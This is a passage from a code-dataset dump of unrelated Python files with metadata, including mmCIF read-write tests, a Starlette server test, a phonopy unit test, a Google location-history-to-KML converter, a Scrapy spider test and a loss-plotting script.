myDataList[0]\n myCat = myBlock.getObj('symmetry')\n print(\"----attribute list %r\\n\" % myCat.getAttributeList())\n row = myCat.getRow(0)\n print(\"----ROW %r\\n\" % row)\n #\n # myCat.dumpIt()\n\n with open(str(rw_data['pathOutputFile2']), \"w\") as ofh:\n pdbxW = PdbxWriter(ofh)\n pdbxW.write(myDataList)\n\n assert len(myDataList) == 1\n\n def test_row_list_initialization(self, rw_data):\n fn = rw_data['pathOutputFile4']\n attributeNameList = ['aOne', 'aTwo', 'aThree', 'aFour', 'aFive', 'aSix', 'aSeven', 'aEight', 'aNine', 'aTen']\n rowList = [[1, 2, 3, 4, 5, 6, 7, 8, 9, 10],\n [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],\n [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],\n [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],\n [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],\n [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],\n [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],\n [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],\n [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],\n [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n ]\n nameCat = 'myCategory'\n\n curContainer = DataContainer(\"myblock\")\n aCat = DataCategory(nameCat, attributeNameList, rowList)\n curContainer.append(aCat)\n\n myContainerList = []\n myContainerList.append(curContainer)\n ofh = open(str(fn), \"w\")\n pdbxW = PdbxWriter(ofh)\n pdbxW.write(myContainerList)\n ofh.close()\n\n myContainerList = []\n ifh = open(str(fn), \"r\")\n pRd = PdbxReader(ifh)\n pRd.read(myContainerList)\n ifh.close()\n for container in myContainerList:\n for objName in container.getObjNameList():\n name, aList, rList = container.getObj(objName).get()\n print(\"Recovered data category %s\\n\" % name)\n print(\"Attribute list %r\\n\" % repr(aList))\n print(\"Row list %r\\n\" % repr(rList))\n assert len(myContainerList) == 1\n\n def test_write_data_file(self, rw_data):\n myDataList = []\n curContainer = DataContainer(\"myblock\")\n aCat = DataCategory(\"pdbx_seqtool_mapping_ref\")\n aCat.appendAttribute(\"ordinal\")\n aCat.appendAttribute(\"entity_id\")\n aCat.appendAttribute(\"auth_mon_id\")\n aCat.appendAttribute(\"auth_mon_num\")\n aCat.appendAttribute(\"pdb_chain_id\")\n aCat.appendAttribute(\"ref_mon_id\")\n aCat.appendAttribute(\"ref_mon_num\")\n aCat.append([1, 2, 3, 4, 5, 6, 7])\n aCat.append([1, 2, 3, 4, 5, 6, 7])\n aCat.append([1, 2, 3, 4, 5, 6, 7])\n aCat.append([1, 2, 3, 4, 5, 6, 7])\n aCat.append([7, 6, 5, 4, 3, 2, 1])\n curContainer.append(aCat)\n\n myDataList.append(curContainer)\n with open(str(rw_data['pathOutputFile1']), \"w\") as ofh:\n pdbxW = PdbxWriter(ofh)\n pdbxW.write(myDataList)\n assert len(myDataList) == 1\n\n def test_update_data_file(self, rw_data):\n myDataList = []\n\n curContainer = DataContainer(\"myblock\")\n aCat = DataCategory(\"pdbx_seqtool_mapping_ref\")\n aCat.appendAttribute(\"ordinal\")\n aCat.appendAttribute(\"entity_id\")\n aCat.appendAttribute(\"auth_mon_id\")\n aCat.appendAttribute(\"auth_mon_num\")\n aCat.appendAttribute(\"pdb_chain_id\")\n aCat.appendAttribute(\"ref_mon_id\")\n aCat.appendAttribute(\"ref_mon_num\")\n aCat.append([9, 2, 3, 4, 5, 6, 7])\n aCat.append([10, 2, 3, 4, 5, 6, 7])\n aCat.append([11, 2, 3, 4, 5, 6, 7])\n aCat.append([12, 2, 3, 4, 5, 6, 7])\n\n curContainer.append(aCat)\n myDataList.append(curContainer)\n ofh = open(str(rw_data['pathOutputFile1']), \"w\")\n pdbxW = PdbxWriter(ofh)\n pdbxW.write(myDataList)\n ofh.close()\n\n myDataList = []\n ifh = open(str(rw_data['pathOutputFile1']), \"r\")\n pRd = PdbxReader(ifh)\n pRd.read(myDataList)\n ifh.close()\n myBlock = myDataList[0]\n myCat = myBlock.getObj('pdbx_seqtool_mapping_ref')\n for iRow in range(0, myCat.getRowCount()):\n myCat.setValue('some value', 
'ref_mon_id', iRow)\n myCat.setValue(100, 'ref_mon_num', iRow)\n\n with open(str(rw_data['pathOutputFile2']), \"w\") as ofh:\n pdbxW = PdbxWriter(ofh)\n pdbxW.write(myDataList)\n\n assert len(myDataList) == 1\n\n def test_read_data_file(self, rw_data):\n myDataList = []\n ifh = open(str(rw_data['pathPdbxDataFile']), \"r\")\n pRd = PdbxReader(ifh)\n pRd.read(myDataList)\n ifh.close()\n assert len(myDataList) == 1\n\n def test_read_write_data_file(self, rw_data):\n myDataList = []\n with open(str(rw_data['pathPdbxDataFile']), \"r\") as ifh:\n pRd = PdbxReader(ifh)\n pRd.read(myDataList)\n\n with open(str(rw_data['pathOutputFile1']), \"w\") as ofh:\n pWr = PdbxWriter(ofh)\n pWr.write(myDataList)\n assert len(myDataList) == 1\n\n def test_read_write_list_accessors(self, rw_data):\n dc = DataCategoryBase('test', attributeNameList=['a', 'b', 'c', 'd'])\n\n dc.append([1, 2, 3, 4])\n dc.append([1, 2, 3, 4])\n dc.append([1, 2, 3, 4])\n dc.append([1, 2, 3, 4, 5, 6, 7])\n dc.append([1, 2, 3, 4])\n\n dc.insert(0, [4, 3, 2, 1])\n\n print(\"Full %r\\n\" % dc)\n print(\"slice %r\\n\" % dc[2:4])\n print(\"last %r\\n\" % dc[-1])\n\n for r in dc:\n print(\"row data %r\\n\" % r)\n\n dc.setMapping('ATTRIBUTE')\n for r in dc:\n print(\"row attrib dict %r\\n\" % r)\n\n dc.setMapping('ITEM')\n for r in dc:\n print(\"row item dict %r\\n\" % r)\n\n dc.setMapping('DATA')\n\n print(\"row 3 %r\\n\" % dc[3])\n tmp = dc[3]\n dc[3] = []\n print(\"row 3 %r\\n\" % dc[3])\n dc[3] = tmp\n print(\"row 3 %r\\n\" % dc[3])\n\n dc.setMapping('ATTRIBUTE')\n tmp = dc[3]\n\n dt = {}\n for k, v in tmp.items():\n dt[k] = 10000\n print(\"row dict %r\\n\" % dt)\n\n dc[3] = dt\n print(\"row 3%r\\n\" % dc[3])\n dc[3] = tmp\n\n dc.setMapping('ITEM')\n tmp = dc[3]\n\n dt = {}\n for k, v in tmp.items():\n dt[k] = 10001\n print(\"row dict %r\\n\" % dt)\n\n dc[3] = dt\n print(\"row 3 %r\\n\" % dc[3])\n\n print(\"print raw %r\\n\" % dc)\n print(\"print string %s\\n\" % dc)\n\n def test_update_attribute(self, rw_data):\n ifn = rw_data['pathBigPdbxDataFile']\n ofn = rw_data['pathOutputFile2']\n myContainerList = []\n with open(str(ifn), \"r\") as ifh:\n pRd = PdbxReader(ifh)\n pRd.read(myContainerList)\n #\n dsId = \"D_000000\"\n atName = 'entry_id'\n for container in myContainerList:\n container.setName(dsId)\n # remove category citation\n container.remove('citation')\n for objName in container.getObjNameList():\n dcObj = container.getObj(objName)\n if dcObj.hasAttribute(atName):\n for iRow in range(0, dcObj.getRowCount()):\n dcObj.setValue(dsId, attributeName=atName, rowIndex=iRow)\n elif objName.lower() == 'entry':\n dcObj.setValue(dsId, attributeName='id', rowIndex=0)\n\n #\n with open(str(ofn), \"w\") as ofh:\n pWr = PdbxWriter(ofh)\n pWr.write(myContainerList)\n assert len(myContainerList) == 1\n\n def test_read_write_data_file_stop(self, rw_data):\n myDataList = []\n with open(str(rw_data['pathTestFileStop']), \"r\") as ifh:\n pRd = PdbxReader(ifh)\n pRd.read(myDataList)\n\n with open(str(rw_data['pathOutputFile3']), \"w\") as ofh:\n pWr = PdbxWriter(ofh)\n pWr.write(myDataList)\n assert len(myDataList) == 1\n\n def test_row_dict_initialization(self, rw_data):\n rLen = 10\n fn = rw_data['pathOutputFile5']\n attributeNameList = ['a', 'b', 'c', 'd']\n rowList = [{'a': 1, 'b': 2, 'c': 3, 'd': 4} for i in range(rLen)]\n nameCat = 'myCategory'\n #\n #\n curContainer = DataContainer(\"myblock\")\n aCat = DataCategory(nameCat, attributeNameList, rowList)\n aCat.append({'a': 1, 'b': 2, 'c': 3, 'd': 4})\n aCat.append({'a': 1, 'b': 2, 'c': 3, 'd': 
4})\n aCat.extend(rowList)\n curContainer.append(aCat)\n aCat.renameAttributes({'a': 'aa', 'b': 'bb', 'c': 'cc', 'd': 'dd'})\n aCat.setName('renamedCategory')\n #\n #\n myContainerList = []\n myContainerList.append(curContainer)\n ofh = open(str(fn), \"w\")\n pdbxW = PdbxWriter(ofh)\n pdbxW.write(myContainerList)\n ofh.close()\n\n myContainerList = []\n ifh = open(str(fn), \"r\")\n pRd = PdbxReader(ifh)\n pRd.read(myContainerList)\n ifh.close()\n for container in myContainerList:\n for objName in container.getObjNameList():\n name, aList, rList = container.getObj(objName).get()\n print(\"Recovered data category %s\\n\" % name)\n print(\"Attribute list %r\\n\" % repr(aList))\n print(\"Row list %r\\n\" % repr(rList))\n assert len(myContainerList) == 1\n assert len(rList) == 2 * rLen + 2\n\n", "sub_path": "tests/pdbx_read_write_test.py", "file_name": "pdbx_read_write_test.py", "file_ext": "py", "file_size_in_byte": 12384, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pathlib2.Path", "line_number": 33, "usage_type": "call"}, {"api_name": "pathlib2.Path", "line_number": 34, "usage_type": "call"}, {"api_name": "pathlib2.Path", "line_number": 35, "usage_type": "call"}, {"api_name": "pathlib2.Path", "line_number": 36, "usage_type": "call"}, {"api_name": "pathlib2.Path", "line_number": 37, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 29, "usage_type": "call"}, {"api_name": "mmcif.api.PdbxContainers.DataContainer", "line_number": 44, "usage_type": "call"}, {"api_name": "mmcif.api.DataCategory.DataCategory", "line_number": 45, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxWriter.PdbxWriter", "line_number": 68, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxReader.PdbxReader", "line_number": 76, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxWriter.PdbxWriter", "line_number": 88, "usage_type": "call"}, {"api_name": "mmcif.api.PdbxContainers.DataContainer", "line_number": 109, "usage_type": "call"}, {"api_name": "mmcif.api.DataCategory.DataCategory", "line_number": 110, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxWriter.PdbxWriter", "line_number": 116, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxReader.PdbxReader", "line_number": 122, "usage_type": "call"}, {"api_name": "mmcif.api.PdbxContainers.DataContainer", "line_number": 135, "usage_type": "call"}, {"api_name": "mmcif.api.DataCategory.DataCategory", "line_number": 136, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxWriter.PdbxWriter", "line_number": 153, "usage_type": "call"}, {"api_name": "mmcif.api.PdbxContainers.DataContainer", "line_number": 160, "usage_type": "call"}, {"api_name": "mmcif.api.DataCategory.DataCategory", "line_number": 161, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxWriter.PdbxWriter", "line_number": 177, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxReader.PdbxReader", "line_number": 183, "usage_type": "call"}, {"api_name": "six.moves.range", "line_number": 188, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxWriter.PdbxWriter", "line_number": 193, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxReader.PdbxReader", "line_number": 201, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxReader.PdbxReader", "line_number": 209, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxWriter.PdbxWriter", "line_number": 213, "usage_type": "call"}, {"api_name": "mmcif.api.DataCategoryBase.DataCategoryBase", "line_number": 218, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxReader.PdbxReader", 
"line_number": 283, "usage_type": "call"}, {"api_name": "six.moves.range", "line_number": 295, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxWriter.PdbxWriter", "line_number": 302, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxReader.PdbxReader", "line_number": 309, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxWriter.PdbxWriter", "line_number": 313, "usage_type": "call"}, {"api_name": "six.moves.range", "line_number": 321, "usage_type": "call"}, {"api_name": "mmcif.api.PdbxContainers.DataContainer", "line_number": 325, "usage_type": "call"}, {"api_name": "mmcif.api.DataCategory.DataCategory", "line_number": 326, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxWriter.PdbxWriter", "line_number": 338, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxReader.PdbxReader", "line_number": 344, "usage_type": "call"}]} +{"seq_id": "150198022", "text": "import os\nimport threading\nimport time\n\nimport pytest\nimport requests\nfrom starlette.applications import Starlette\n\nfrom aws.app import create_app, run_server\n\n\nasync def test_create_app(mocker):\n mocker.patch(\"aws.app.init_logging\")\n mocker.patch(\"aws.app.logger\")\n api = mocker.patch(\"aws.app.api\")\n api.add_routes = lambda x: x\n\n app = create_app()\n assert isinstance(app, Starlette)\n\n\nasync def test_run():\n timeout = 1\n try_every = 0.1\n host = \"127.0.0.1\"\n port = 8001\n\n os.environ[\"HOST\"] = host\n os.environ[\"PORT\"] = str(port)\n os.environ[\"RELOAD\"] = \"0\"\n os.environ[\"DEBUG\"] = \"0\"\n\n thread = threading.Thread(target=run_server)\n thread.daemon = True\n thread.start()\n\n time_ = 0\n while time_ < timeout:\n try:\n resp = requests.get(f\"http://{host}:{port}/ping\")\n assert resp.status_code == 200\n break\n except requests.exceptions.ConnectionError:\n time_ = time_ + try_every\n time.sleep(try_every)\n\n\nasync def test_run__missing_variables():\n host = \"127.0.0.1\"\n port = 8001\n\n del os.environ[\"HOST\"]\n del os.environ[\"PORT\"]\n\n with pytest.raises(RuntimeError):\n run_server()\n\n os.environ[\"HOST\"] = host\n with pytest.raises(RuntimeError):\n run_server()\n del os.environ[\"HOST\"]\n\n os.environ[\"PORT\"] = str(port)\n with pytest.raises(RuntimeError):\n run_server()\n", "sub_path": "tests/unit_tests/test_app.py", "file_name": "test_app.py", "file_ext": "py", "file_size_in_byte": 1436, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "aws.app.create_app", "line_number": 18, "usage_type": "call"}, {"api_name": "starlette.applications.Starlette", "line_number": 19, "usage_type": "argument"}, {"api_name": "os.environ", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 31, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 33, "usage_type": "call"}, {"api_name": "aws.app.run_server", "line_number": 33, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 40, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 43, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 45, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 53, "usage_type": "attribute"}, {"api_name": "pytest.raises", "line_number": 55, "usage_type": "call"}, {"api_name": 
"aws.app.run_server", "line_number": 56, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 58, "usage_type": "attribute"}, {"api_name": "pytest.raises", "line_number": 59, "usage_type": "call"}, {"api_name": "aws.app.run_server", "line_number": 60, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 61, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pytest.raises", "line_number": 64, "usage_type": "call"}, {"api_name": "aws.app.run_server", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "206281306", "text": "import unittest\nimport os\nimport numpy as np\nfrom phonopy import Phonopy\nfrom phonopy.interface.vasp import read_vasp\nfrom phonopy.file_IO import parse_FORCE_SETS, parse_BORN\nfrom phonopy.phonon.band_structure import get_band_qpoints\n\ndata_dir = os.path.dirname(os.path.abspath(__file__))\n\n\nclass TestBandStructure(unittest.TestCase):\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n def _get_phonon(self):\n cell = read_vasp(os.path.join(data_dir, \"..\", \"POSCAR_NaCl\"))\n phonon = Phonopy(cell,\n np.diag([2, 2, 2]),\n primitive_matrix=[[0, 0.5, 0.5],\n [0.5, 0, 0.5],\n [0.5, 0.5, 0]])\n filename = os.path.join(data_dir, \"..\", \"FORCE_SETS_NaCl\")\n force_sets = parse_FORCE_SETS(filename=filename)\n phonon.set_displacement_dataset(force_sets)\n phonon.produce_force_constants()\n filename_born = os.path.join(data_dir, \"..\", \"BORN_NaCl\")\n nac_params = parse_BORN(phonon.get_primitive(), filename=filename_born)\n phonon.set_nac_params(nac_params)\n return phonon\n\n def test_band(self):\n self._test_band()\n\n def test_with_group_velocities(self):\n self._test_band(with_group_velocities=True)\n\n def test_is_band_connection(self):\n self._test_band(is_band_connection=True)\n\n def _test_band(self,\n with_group_velocities=False,\n is_band_connection=False):\n band_paths = [[[0, 0, 0], [0.5, 0.5, 0.5]],\n [[0.5, 0.5, 0], [0, 0, 0], [0.5, 0.25, 0.75]]]\n qpoints = get_band_qpoints(band_paths, npoints=11)\n phonon = self._get_phonon()\n phonon.run_band_structure(qpoints,\n with_group_velocities=with_group_velocities,\n is_band_connection=is_band_connection)\n band_structure = phonon.band_structure\n phonon.get_band_structure_dict()\n\n self.assertTrue(id(band_structure.distances),\n id(band_structure.get_distances()))\n self.assertTrue(id(band_structure.qpoints),\n id(band_structure.get_qpoints()))\n self.assertTrue(id(band_structure.frequencies),\n id(band_structure.get_frequencies()))\n self.assertTrue(id(band_structure.eigenvectors),\n id(band_structure.get_eigenvectors()))\n self.assertTrue(id(band_structure.group_velocities),\n id(band_structure.get_group_velocities()))\n\n\nif __name__ == '__main__':\n suite = unittest.TestLoader().loadTestsFromTestCase(TestBandStructure)\n unittest.TextTestRunner(verbosity=2).run(suite)\n", "sub_path": "test/phonon/test_band_structure.py", "file_name": "test_band_structure.py", "file_ext": "py", "file_size_in_byte": 2785, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.dirname", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 9, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 12, "usage_type": "attribute"}, {"api_name": "phonopy.interface.vasp.read_vasp", "line_number": 20, "usage_type": "call"}, 
{"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "phonopy.Phonopy", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "phonopy.file_IO.parse_FORCE_SETS", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "phonopy.file_IO.parse_BORN", "line_number": 31, "usage_type": "call"}, {"api_name": "phonopy.phonon.band_structure.get_band_qpoints", "line_number": 49, "usage_type": "call"}, {"api_name": "unittest.TestLoader", "line_number": 70, "usage_type": "call"}, {"api_name": "unittest.TextTestRunner", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "255212103", "text": "\"\"\"\nConvert LocationHistory.json from Google takeout of location history (latitude)\nto a usable KML file for viewing in Google Earth.\n\n\nUsage: \n\n python json_history_to_kml.py LocationHistory.json\n\n\n\nExample kml output:\n \n \n \n Simple placemark\n Attached to the ground. Intelligently places itself \n at the height of the underlying terrain.\n \n -122.0822035425683,37.42228990140251,0\n \n \n \n\nExample JSON input:\n {\n \"locations\" : [ {\n \"timestampMs\" : \"1373570050813\",\n \"latitudeE7\" : 320946855,\n \"longitudeE7\" : 347981459,\n \"accuracy\" : 53\n },\n }\n\n\n\"\"\"\n\nimport sys\nimport json\nimport time\nimport os\n\nDAYS_DIR = 'kmldays'\n\nloc_fmt = \"\"\"\n \n {name}\n {description}\n \n {coordinates}\n \n \"\"\"\n\nkml_start = \"\"\"\n\n\"\"\"\n\nkml_end =\"\"\"\n\n\"\"\"\n\n\nclass KML:\n def __init__(self, fn):\n self.fn = fn\n self.fhand = open(self.fn, 'wb')\n self.fhand.write(kml_start)\n self.to_close = []\n \n def close(self):\n while len(self.to_close) > 0:\n self._close_one()\n self.fhand.write(kml_end)\n self.fhand.close()\n \n def _indent(self):\n return ' ' * len(self.to_close)\n \n def _node(self, node):\n spaces = self._indent()\n self._line('<%s>' % node)\n self.to_close.append('\\n%s' % (spaces, node))\n \n def _line(self, text):\n self.fhand.write('\\n%s%s' % (self._indent(), text))\n \n def Folder(self, name):\n self._node('Folder')\n self._line('%s' % name)\n self._line('0')\n \n def NetworkLink(self, name, fn):\n self._node('NetworkLink')\n self._line('%s' % name)\n self._line('0')\n self._line('%s' % fn)\n self._close_one()\n \n def PlaceMark(self, name, description, lat, lon):\n coord_str = \"%s,%s,0\" % (lon, lat)\n node = loc_fmt.format(name=name,\n description=description,\n coordinates=coord_str)\n self.fhand.write(node)\n \n def _close_one(self, expected=None):\n text = self.to_close.pop()\n if expected is not None:\n if not expected in text:\n raise Exception(\"Expected to close '%s' but found '%s'\" % (expected, text))\n self.fhand.write(text)\n \n\n\ndef main():\n fn = sys.argv[1]\n \n days_dir = os.path.join(os.path.dirname(fn), DAYS_DIR)\n \n if not os.path.exists(days_dir):\n os.mkdir(days_dir)\n \n out_fn = fn + '.kml'\n print('loading json')\n data = json.load(open(fn))\n locations = data['locations']\n cur_year = None\n cur_day = None\n day_kml = None\n print('handling %d points' % len(locations))\n \n kml = KML(out_fn)\n for i, loc in enumerate(locations):\n time_s = float(loc['timestampMs']) / 
1e3\n lat = float(loc['latitudeE7']) / 1e7\n lon = float(loc['longitudeE7']) / 1e7\n coord_str = \"%s,%s,0\" % (lon, lat)\n acc = loc.get('accuracy', 'n/a')\n tm = time.gmtime(time_s)\n date_str = time.strftime(\"%Y-%m-%d\", tm)\n time_str = time.strftime(\"%Y-%m-%d %a %H:%M:%S\", tm)\n desc_str = 'accuracy %s meters' % acc\n\n if i % 1000 == 0:\n sys.stdout.write('.')\n\n if date_str != cur_day:\n if i != 0:\n #break\n #kml._close_one('Folder') # previous day\n day_kml.close()\n\n if tm.tm_year != cur_year:\n if i != 0:\n kml._close_one('Folder') # previous year\n\n cur_year = tm.tm_year\n kml.Folder(name=str(cur_year))\n\n cur_day = date_str\n #kml.Folder(name=str(date_str))\n day_fn = os.path.join(days_dir, date_str + '.kml')\n day_kml = KML(day_fn)\n kml.NetworkLink(name=date_str, fn=day_fn)\n\n\n #fhand.write(node)\n name = time_str\n description = desc_str\n coordinates = coord_str\n day_kml.PlaceMark(name, description, lon=lon, lat=lat)\n\n kml.close()\n \n \n\nif __name__ == \"__main__\":\n main()\n\n\n", "sub_path": "all-gists/6204256/snippet.py", "file_name": "snippet.py", "file_ext": "py", "file_size_in_byte": 4711, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sys.argv", "line_number": 116, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path", "line_number": 118, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 121, "usage_type": "call"}, {"api_name": "json.load", "line_number": 125, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 139, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 140, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 141, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 145, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 145, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 162, "usage_type": "call"}, {"api_name": "os.path", "line_number": 162, "usage_type": "attribute"}]} +{"seq_id": "326372409", "text": "import unittest\n\nimport scrapy\nimport other_validators\nfrom scrapy.crawler import CrawlerProcess\n\ntest_configs = [\n {\n \"allowed_domains\": [\"www.nyu.edu\"],\n \"start_urls\": [\"http://www.nyu.edu/students/getting-started-at-nyu/getting-started-at-nyu2017/real-talk.html\"],\n \"expect\": 8\n },\n {\n \"allowed_domains\": [\"www.foxmovies.com\"],\n \"start_urls\": [\"http://www.foxmovies.com\"],\n \"expect\": 8\n },\n ##### This is an edge case where videom\n # {\n # \"allowed_domains\":[\"www.deloitte.com\"],\n # \"start_urls\": [\"https://www2.deloitte.com/us/en/pages/deloitte-analytics/topics/deloitte-analytics-services.html?icid=top_deloitte-analytics-services\"],\n # \"expect\": 1\n # }\n]\n\n\nclass TestSpider(scrapy.Spider):\n name = \"testspider\"\n allowed_domains = []\n start_urls = []\n expect_result = None\n parent = None\n\n def start_requests(self):\n yield scrapy.Request(self.start_urls[0], self.parse)\n\n def parse(self, response):\n # import pdb; pdb.set_trace();\n yt_player_count = other_validators.valid_youtube_players(response)\n # self.assertEqual(yt_player_count, self.expect_result)\n print(\" YouTube player found on link: \" + 
response.url + \" \", '*')\n        if self.parent:\n            self.parent.check_spider_output(self.expect_result, yt_player_count)\n\n\nclass SpidersTestRunner(unittest.TestCase):\n    def test_run(self):\n        process = CrawlerProcess()\n\n        for spider in test_configs:\n            process.crawl(TestSpider, allowed_domains=spider[\"allowed_domains\"], start_urls=spider[\"start_urls\"],\n                          expect_result=spider[\"expect\"], parent=self)\n\n        # crawl() only schedules the spiders; start() actually runs them\n        process.start()\n\n    def check_spider_output(self, expect, result):\n        self.assertEqual(expect, result)\n\n\n# if __name__ == '__main__':\n#     unittest.main()\nsuite = unittest.TestLoader().loadTestsFromTestCase(SpidersTestRunner)\nunittest.TextTestRunner(verbosity=2).run(suite)\n", "sub_path": "crawler/modules/video_player_validators/test_other_validators.py", "file_name": "test_other_validators.py", "file_ext": "py", "file_size_in_byte": 1962, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "scrapy.Spider", "line_number": 27, "usage_type": "attribute"}, {"api_name": "scrapy.Request", "line_number": 35, "usage_type": "call"}, {"api_name": "other_validators.valid_youtube_players", "line_number": 39, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 46, "usage_type": "attribute"}, {"api_name": "scrapy.crawler.CrawlerProcess", "line_number": 48, "usage_type": "call"}, {"api_name": "unittest.TestLoader", "line_number": 61, "usage_type": "call"}, {"api_name": "unittest.TextTestRunner", "line_number": 62, "usage_type": "call"}]}
{"seq_id": "177941892", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nfrom collections import defaultdict\n\nplt_colors = ['c', 'r', 'g', 'b', 'y', 'k', 'm', '#2A0134', '#FF00FF', '#800000']\nplt_markers = ['*', '.', 'o', '^', 'v', '<', '>', '1', '2', '3', '4', 's', 'p', ',']\nfont = {\n    'size': 18\n}\n\nsrc_domain, tgt_domain = 'usa', 'sng'\nplt_title = ''\nsub_dir = 'contrast_usa_v1'\nlog_file = f'../checkpoints/fusion_consis/xmuda/{sub_dir}/log.log' # to add: tgt_val, src_val\n\n\naccf = open(log_file, 'r')\nlines = accf.readlines()\naccf.close()\nlosses = defaultdict(list)\nfor line in lines:\n    if 'Epoch' in line:\n        splits = line.split(', ')\n        for token in splits:\n            for loss_type in ['contrast_loss', 'seg_loss', 'tgt_contrast_loss']:\n                if token.startswith(loss_type):\n                    losses[loss_type].append(float(token.split(': ')[1]))\nif 'contrast_loss' in losses.keys():\n    losses['src_contrast_loss'] = losses['contrast_loss']\n    del losses['contrast_loss']\nx_len = len(losses['seg_loss'])\nx_range = np.arange(x_len) + 1\n\n\nif __name__ == '__main__':\n    plt.title(plt_title, font)\n    # plt.xlabel('log_interval(every 25 batches)', font)\n    plt.xlabel('epoch', font)\n    plt.ylabel('loss', font)\n    for i, (key, val) in enumerate(losses.items()):\n        val = np.array(val)\n        plt.plot(x_range, val, label=key, color=plt_colors[i], linewidth=1.)\n    plt.xticks(range(0, x_len, x_len // 24), labels=range(0, 25))\n    plt.legend(loc='best', prop=font)\n    plt.ylim(bottom=0)\n    plt.show()\n", "sub_path": "scripts/old/old_loss_curve.py", "file_name": "old_loss_curve.py", "file_ext": "py", "file_size_in_byte": 1526, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "collections.defaultdict", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": 
